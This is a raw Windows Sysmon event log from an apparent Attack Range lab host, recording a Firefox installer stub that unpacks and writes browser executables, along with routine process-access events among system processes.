13:59:45.958{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\firefox.exe2021-01-18 13:59:45.958 11241100x800000000000000013959Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:59:45.943{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\default-browser-agent.exe2021-01-18 13:59:45.943 11241100x800000000000000013958Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:59:45.943{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\crashreporter.exe2021-01-18 13:59:45.943 10341000x800000000000000013957Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.849{59A5CD1D-940F-6005-0C05-00000000A301}64766824C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+141977|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\SYSTEM32\IEFRAME.dll+13bf2f|C:\Windows\SYSTEM32\IEFRAME.dll+1bf969|C:\Windows\SYSTEM32\IEFRAME.dll+3f8de|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013956Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.849{59A5CD1D-940F-6005-0C05-00000000A301}64766824C:\Program 
Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1418e2|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\SYSTEM32\IEFRAME.dll+13bf2f|C:\Windows\SYSTEM32\IEFRAME.dll+1bf969|C:\Windows\SYSTEM32\IEFRAME.dll+3f8de|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013955Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.849{59A5CD1D-940F-6005-0C05-00000000A301}64766824C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1418c7|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\SYSTEM32\IEFRAME.dll+13bf2f|C:\Windows\SYSTEM32\IEFRAME.dll+1bf969|C:\Windows\SYSTEM32\IEFRAME.dll+3f8de|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000013954Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.849{59A5CD1D-940F-6005-0C05-00000000A301}64766824C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1418c7|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\windows.storage.dll+53721|C:\Windows\System32\windows.storage.dll+53669|C:\Windows\System32\windows.storage.dll+175f6|C:\Windows\SYSTEM32\IEFRAME.dll+13bf2f|C:\Windows\SYSTEM32\IEFRAME.dll+1bf969|C:\Windows\SYSTEM32\IEFRAME.dll+3f8de|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013953Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.786{59A5CD1D-940F-6005-0C05-00000000A301}64766576C:\Program Files\Internet 
Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+141977|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\shcore.dll+32707|C:\Windows\SYSTEM32\IEFRAME.dll+5f954|C:\Windows\SYSTEM32\IEFRAME.dll+5f74d|C:\Windows\SYSTEM32\IEFRAME.dll+5f422|C:\Windows\SYSTEM32\IEFRAME.dll+5f177|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013952Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.786{59A5CD1D-940F-6005-0C05-00000000A301}64766576C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1418e2|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\shcore.dll+32707|C:\Windows\SYSTEM32\IEFRAME.dll+5f954|C:\Windows\SYSTEM32\IEFRAME.dll+5f74d|C:\Windows\SYSTEM32\IEFRAME.dll+5f422|C:\Windows\SYSTEM32\IEFRAME.dll+5f177|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013951Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.786{59A5CD1D-940F-6005-0C05-00000000A301}64766576C:\Program Files\Internet 
Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1418c7|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\shcore.dll+32707|C:\Windows\SYSTEM32\IEFRAME.dll+5f954|C:\Windows\SYSTEM32\IEFRAME.dll+5f74d|C:\Windows\SYSTEM32\IEFRAME.dll+5f422|C:\Windows\SYSTEM32\IEFRAME.dll+5f177|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013950Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.786{59A5CD1D-940F-6005-0C05-00000000A301}64766576C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1418c7|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\shcore.dll+32707|C:\Windows\SYSTEM32\IEFRAME.dll+5f954|C:\Windows\SYSTEM32\IEFRAME.dll+5f74d|C:\Windows\SYSTEM32\IEFRAME.dll+5f422|C:\Windows\SYSTEM32\IEFRAME.dll+5f177|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000013949Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.771{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b14b5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013948Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.771{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b13ce|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013947Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:45.771{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013946Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.771{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b0e30|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013945Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.771{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+97140|C:\Windows\System32\SHELL32.dll+b0dec|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000013944Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.771{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013943Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.771{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013942Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.693{59A5CD1D-93F6-6005-E604-00000000A301}48881684C:\Windows\system32\csrss.exe{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013941Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.677{59A5CD1D-9451-6005-2505-00000000A301}63525472C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013940Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.646{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013939Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:45.646{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013938Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.646{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013937Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:45.646{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013936Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.646{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe+57f3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\se
tup-stub.exe+1eeb|C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe+13a8|C:\Windows\SYSTEM32\ntdll.dll+70ead(wow64) 154100x800000000000000013935Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.139{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exe18.05FirefoxFirefoxMozilla7zS.sfx.exe"C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exe" /LaunchedFromStub /INI=C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\config.iniC:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=DB67C121EF802BE02DB5DF2C6205E32B,SHA256=72DA530C3BDD6142F8C29662BAC81AA6537C9B18289151E8D7F2318BFADCE6DD,IMPHASH=00000000000000000000000000000000{59A5CD1D-944E-6005-2205-00000000A301}6120C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe.\setup-stub.exe 10341000x800000000000000013934Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.521{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9451-6005-2505-00000000A301}6352C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013933Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:45.521{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013932Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:45.521{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013931Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
